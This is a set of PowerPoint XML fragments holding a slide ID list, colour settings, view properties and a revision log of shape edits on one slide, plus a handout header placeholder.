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3" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId107"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId108"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="353" r:id="rId5"/>
    <p:sldId id="392" r:id="rId6"/>
    <p:sldId id="421" r:id="rId7"/>
    <p:sldId id="394" r:id="rId8"/>
    <p:sldId id="529" r:id="rId9"/>
    <p:sldId id="480" r:id="rId10"/>
    <p:sldId id="491" r:id="rId11"/>
    <p:sldId id="492" r:id="rId12"/>
    <p:sldId id="493" r:id="rId13"/>
    <p:sldId id="410" r:id="rId14"/>
    <p:sldId id="448" r:id="rId15"/>
    <p:sldId id="450" r:id="rId16"/>
    <p:sldId id="449" r:id="rId17"/>
    <p:sldId id="464" r:id="rId18"/>
    <p:sldId id="465" r:id="rId19"/>
    <p:sldId id="530" r:id="rId20"/>
    <p:sldId id="531" r:id="rId21"/>
    <p:sldId id="532" r:id="rId22"/>
    <p:sldId id="533" r:id="rId23"/>
    <p:sldId id="534" r:id="rId24"/>
    <p:sldId id="535" r:id="rId25"/>
    <p:sldId id="564" r:id="rId26"/>
    <p:sldId id="511" r:id="rId27"/>
    <p:sldId id="422" r:id="rId28"/>
    <p:sldId id="474" r:id="rId29"/>
    <p:sldId id="413" r:id="rId30"/>
    <p:sldId id="400" r:id="rId31"/>
    <p:sldId id="504" r:id="rId32"/>
    <p:sldId id="506" r:id="rId33"/>
    <p:sldId id="507" r:id="rId34"/>
    <p:sldId id="508" r:id="rId35"/>
    <p:sldId id="509" r:id="rId36"/>
    <p:sldId id="402" r:id="rId37"/>
    <p:sldId id="475" r:id="rId38"/>
    <p:sldId id="528" r:id="rId39"/>
    <p:sldId id="536" r:id="rId40"/>
    <p:sldId id="537" r:id="rId41"/>
    <p:sldId id="490" r:id="rId42"/>
    <p:sldId id="518" r:id="rId43"/>
    <p:sldId id="519" r:id="rId44"/>
    <p:sldId id="481" r:id="rId45"/>
    <p:sldId id="484" r:id="rId46"/>
    <p:sldId id="451" r:id="rId47"/>
    <p:sldId id="520" r:id="rId48"/>
    <p:sldId id="452" r:id="rId49"/>
    <p:sldId id="521" r:id="rId50"/>
    <p:sldId id="453" r:id="rId51"/>
    <p:sldId id="522" r:id="rId52"/>
    <p:sldId id="455" r:id="rId53"/>
    <p:sldId id="456" r:id="rId54"/>
    <p:sldId id="457" r:id="rId55"/>
    <p:sldId id="486" r:id="rId56"/>
    <p:sldId id="458" r:id="rId57"/>
    <p:sldId id="459" r:id="rId58"/>
    <p:sldId id="460" r:id="rId59"/>
    <p:sldId id="487" r:id="rId60"/>
    <p:sldId id="542" r:id="rId61"/>
    <p:sldId id="543" r:id="rId62"/>
    <p:sldId id="544" r:id="rId63"/>
    <p:sldId id="545" r:id="rId64"/>
    <p:sldId id="546" r:id="rId65"/>
    <p:sldId id="547" r:id="rId66"/>
    <p:sldId id="548" r:id="rId67"/>
    <p:sldId id="549" r:id="rId68"/>
    <p:sldId id="550" r:id="rId69"/>
    <p:sldId id="563" r:id="rId70"/>
    <p:sldId id="559" r:id="rId71"/>
    <p:sldId id="560" r:id="rId72"/>
    <p:sldId id="494" r:id="rId73"/>
    <p:sldId id="510" r:id="rId74"/>
    <p:sldId id="495" r:id="rId75"/>
    <p:sldId id="501" r:id="rId76"/>
    <p:sldId id="502" r:id="rId77"/>
    <p:sldId id="503" r:id="rId78"/>
    <p:sldId id="551" r:id="rId79"/>
    <p:sldId id="538" r:id="rId80"/>
    <p:sldId id="539" r:id="rId81"/>
    <p:sldId id="540" r:id="rId82"/>
    <p:sldId id="541" r:id="rId83"/>
    <p:sldId id="523" r:id="rId84"/>
    <p:sldId id="524" r:id="rId85"/>
    <p:sldId id="525" r:id="rId86"/>
    <p:sldId id="526" r:id="rId87"/>
    <p:sldId id="552" r:id="rId88"/>
    <p:sldId id="553" r:id="rId89"/>
    <p:sldId id="554" r:id="rId90"/>
    <p:sldId id="558" r:id="rId91"/>
    <p:sldId id="555" r:id="rId92"/>
    <p:sldId id="556" r:id="rId93"/>
    <p:sldId id="557" r:id="rId94"/>
    <p:sldId id="512" r:id="rId95"/>
    <p:sldId id="498" r:id="rId96"/>
    <p:sldId id="499" r:id="rId97"/>
    <p:sldId id="500" r:id="rId98"/>
    <p:sldId id="513" r:id="rId99"/>
    <p:sldId id="514" r:id="rId100"/>
    <p:sldId id="515" r:id="rId101"/>
    <p:sldId id="517" r:id="rId102"/>
    <p:sldId id="516" r:id="rId103"/>
    <p:sldId id="527" r:id="rId104"/>
    <p:sldId id="561" r:id="rId105"/>
    <p:sldId id="562" r:id="rId10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3654"/>
    <a:srgbClr val="72829E"/>
    <a:srgbClr val="5B7BB5"/>
    <a:srgbClr val="486AC8"/>
    <a:srgbClr val="339933"/>
    <a:srgbClr val="FF572F"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="FEF8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D049BA-DB32-453D-B6B1-B7729B759B20}" v="63" dt="2025-11-04T13:15:31.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5" autoAdjust="0"/>
    <p:restoredTop sz="95033" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="64" d="100"/>
          <a:sy n="64" d="100"/>
        </p:scale>
        <p:origin x="114" y="78"/>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6/11/relationships/changesInfo" Target="changesInfos/changesInfo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maso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}"/>
    <pc:docChg chg="undo custSel addSld modSld">
      <pc:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:15:40.979" v="256" actId="1036"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:01:35.094" v="12" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="377"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:01:35.094" v="12" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="377"/>
            <ac:spMk id="36869" creationId="{78BA95E1-DD9C-0DD8-974E-67CA12DD470F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:15:40.979" v="256" actId="1036"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2289180836" sldId="442"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:07:07.133" v="184" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="2" creationId="{255A3CFB-6EE8-6FCA-5427-E37B34B3280B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:07:07.133" v="184" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="3" creationId="{8BD93CCE-41C1-A919-141B-FF737799D053}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:07:07.133" v="184" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="4" creationId="{5A4CCB3E-0DA9-DF22-058C-7AB888298C81}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:07:07.133" v="184" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="5" creationId="{769468C3-E31C-5EE6-1023-16A62043486B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:06:53.504" v="183" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="6" creationId="{46BAD9DD-24C4-FCC8-53C4-637A4BAA01F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:12:09.640" v="248" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="7" creationId="{60660E56-13AA-41B4-D14B-CBB1C35938A1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:06:53.504" v="183" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="8" creationId="{20128F4C-D0EC-30FD-5A62-4D06B7C4109D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:06:53.504" v="183" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="9" creationId="{5FE97DE8-AA16-9846-D075-390318353BDB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:11:30.650" v="238" actId="208"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="10" creationId="{BC2B9B62-F418-57A0-8EE3-A022B11B68C3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:11:44.114" v="242" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="11" creationId="{F29C2D40-591D-E3AE-1B0A-2C7BA38CBA82}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:11:37.856" v="241" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="12" creationId="{E664D223-5253-B6DA-9D0D-F7F4BC6079EC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:15:40.979" v="256" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="13" creationId="{A3D82279-F0D5-8B97-FC73-581E41B55991}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:15:40.979" v="256" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="14" creationId="{CB866D4E-B7B0-F7F3-3A9A-E75A23D157A5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:15:40.979" v="256" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="15" creationId="{53D5A52D-CDF1-5C67-7F94-CFE9C017A0D2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:12:02.176" v="246" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="16" creationId="{C64A699E-C1A8-4DD9-9D36-A19E21CECD33}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:12:02.176" v="246" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="17" creationId="{2050A22F-E0A7-4141-8B92-F0C4CDD650C1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:12:02.176" v="246" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="18" creationId="{6C2902E5-B6CB-0721-8683-80155569721D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:01:57.130" v="49" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36869" creationId="{08DF9FAF-DAC9-565A-50FA-E6AD46E9434B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:15:31.327" v="252" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36880" creationId="{C184651E-DB96-8C28-4C90-7CCFBA888C0C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:07:25.273" v="187" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36881" creationId="{AFA4793A-804D-EF47-F8AD-AD327114B152}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:07:19.297" v="186" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36882" creationId="{E28C114C-8D85-545D-0A5D-26BFE8A6B90A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:03:17.150" v="130" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36883" creationId="{E8B620E2-4489-FBEF-2CCB-2622FBF5838E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:48.418" v="141" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36884" creationId="{9B0C91EE-844D-23E0-70B1-878B944AF5A7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:48.418" v="141" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36885" creationId="{9C8F7671-049F-DD0E-5204-73AC0FCAEBF9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:48.418" v="141" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36886" creationId="{BC678FBA-091A-2A95-710B-8B61DC5AE64E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36887" creationId="{648E8A8A-5A2A-6F16-C66D-004162814794}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36889" creationId="{3243DE91-E26B-FEEE-B2E0-4C8B2573634D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36890" creationId="{7BFA8A8E-3EAA-5851-2444-0A9A678BADF2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36891" creationId="{BFBFB290-EE0D-CB03-289C-7E98183921E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:11.637" v="140" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36893" creationId="{334374A0-5419-F5AC-0234-CFD8687888E8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:02:49.440" v="113" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36894" creationId="{CECA3BE2-D430-E2B2-2006-F5B3D45BB538}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:48.418" v="141" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36895" creationId="{8D0EF7D9-ACC7-1864-E9F9-C6F206B4529D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:48.418" v="141" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36896" creationId="{42B359ED-D28A-F09D-FD45-37A780FE284F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36897" creationId="{9461E659-7D45-18B2-9978-B03CA3F90DC7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36898" creationId="{661AD201-B569-D0DA-EBB2-D235CD98BA9D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:03:17.150" v="130" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36899" creationId="{8E77294C-E2CB-2C89-FDB9-067C74E8C697}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:48.418" v="141" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36900" creationId="{9F5B6731-6242-6447-DD9A-FB41EEE7BD56}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36901" creationId="{FBECE880-073E-398F-64C1-F11E88EDFE47}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36902" creationId="{9B504950-A66F-DD57-2BED-0F089E57012F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36903" creationId="{4182A27B-4C01-AE7D-8910-CF5022CC7BC7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36904" creationId="{6B7DADFD-39EC-0279-2B43-7D1C8A842B0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:06:44.923" v="182" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36905" creationId="{142132E3-3F60-3B67-5603-5353A365EE4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03702EA-E1FC-AF3C-50C6-124109291827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2970213" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
